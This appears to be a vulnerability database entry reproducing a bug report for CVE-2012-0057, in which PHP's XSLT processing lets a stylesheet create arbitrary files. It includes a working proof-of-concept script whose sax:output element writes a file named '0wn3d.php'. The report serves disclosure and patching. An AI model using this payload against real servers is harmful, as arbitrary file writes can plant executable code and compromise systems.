php: XSLT file writing vulnerability(CVE-2012-0057)

2012-02-03T00:00:00
ID SSV:30072
Type seebug
Reporter Root
Modified 2012-02-03T00:00:00

Description

No description provided by source.

                                        
                                            
                                                Description:
------------
Current version of PHP5 allow creation of arbitrary files when processing XSLT content. This was tested on the following releases :
- PHP 5.3.2-1ubuntu4.7 with Suhosin-Patch (cli) (built: Jan 12 2011 18:36:08) 
- PHP 5.3.6 (cli) (built: Apr  1 2011 11:26:17)

The problem lies in the unrestricted use of libxslt. The attached patch will forbid some operations like the creation of files or directories, by calling the libxslt security API.



Test script:
---------------
<?php 

$sXml = '<xml><foo>Hello from XML</foo></xml>';
 
$sXsl = <<<EOT
<xsl:stylesheet version="1.0"
	xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
	xmlns:sax="http://icl.com/saxon"
	extension-element-prefixes="sax">

	<xsl:template match="//foo">
		<sax:output href="0wn3d.php" method="text">
			<xsl:value-of select="'0wn3d via PHP and libxslt ...'"/>
			<xsl:apply-templates/>
		</sax:output>
	</xsl:template>

</xsl:stylesheet>
EOT;

# LOAD XML FILE 
$XML = new DOMDocument(); 
$XML->loadXML( $sXml ); 

# LOAD XSLT FILE 
$XSL = new DOMDocument(); 
$XSL->loadXML( $sXsl );

# START XSLT 
$xslt = new XSLTProcessor(); 
$xslt->importStylesheet( $XSL ); 

# TRASNFORM & PRINT 
print $xslt->transformToXML( $XML ); 

?>

Expected result:
----------------
File isn't created and PHP displays some warnings :

Warning: XSLTProcessor::transformToXml(): runtime error: file /somewhere/ line 7 element output in /somewhere/simple_xslt.php on line 34
Warning: XSLTProcessor::transformToXml(): File write for 0wn3d.php refused in /somewhere/simple_xslt.php on line 34
Warning: XSLTProcessor::transformToXml(): runtime error: file /somewhere/ line 7 element output in /somewhere/simple_xslt.php on line 34
Warning: XSLTProcessor::transformToXml(): xsltDocumentElem: write rights for 0wn3d.php denied in /somewhere/simple_xslt.php on line 34


Actual result:
--------------
File '0wn3d.php' is created